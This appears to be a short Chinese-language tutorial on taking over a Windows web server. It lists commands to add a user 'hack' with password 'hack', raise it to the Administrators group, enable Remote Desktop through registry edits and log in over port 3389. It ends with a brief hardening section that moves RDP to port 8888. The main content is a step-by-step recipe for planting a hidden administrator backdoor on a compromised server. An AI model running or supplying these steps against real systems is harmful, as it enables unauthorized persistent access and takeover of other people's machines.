使用命令給windows用戶提權
創建與提權
- 功打開虛擬終端后,首先使用命令“ipconfig”,查看網站服務器的IP地址。
- 接下來,我們使用“whoami”命令查看當前用戶。
- 然后使用“net user”命令,查看網站服務器上的用戶賬戶。
- 使用命令“net user hack hack /add”,添加一個用戶名為hack,密碼為hack的用戶到網站服務器。
- 使用“net user”命令查看,hack用戶添加成功。
- 使用命令“net localgroup Administrators hack /add”,將我們剛添加的hack用戶提升至“管理員權限。
- 然后使用命令net user hack”,查看用戶名為hack的全部賬號信息,可以看到其本地組成員已經提升至管理員。
- “使用命令netstat -an”,查看網站服務器上開啟的端口,可以看到其3389遠程桌面的端“口 已 經 開 啟 。
- 在本地計算機上打開遠程桌面連接,輸入網站服務器的IP“”地址,點擊 連接 ,等待響應。(mstsc遠程桌面 regedit注冊表)
- 成功連接后輸入我們添加的用戶名和密碼后,點擊確定。成功遠程連接到網站服務器,獲取到服務器管理員權限。
::啟用遠程桌面連接
@echo off
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
::禁用遠程桌面連接
@echo off
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
或者:
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
3389安全加固:
既然3389這么危險,所以更改這個默認端口就很有必要了。
- 在命令行下批處理命令
1. REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 0X22B8 /f
2. REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0X22B8 /f
這里要用16進制。0X22B8-->8888
- 圖形化修改:regedit
在注冊表local_machine中system\currntcontrolset\control\terminal server\wds\rdpwd\tds\tcp里面的portnumber改掉。同時該
system\currntcontrolset\control\terminal server\winstations\rdp-tcp里面的portnumber。然后在連接的時候就在ip后面加上端口號192.168.199.137:8888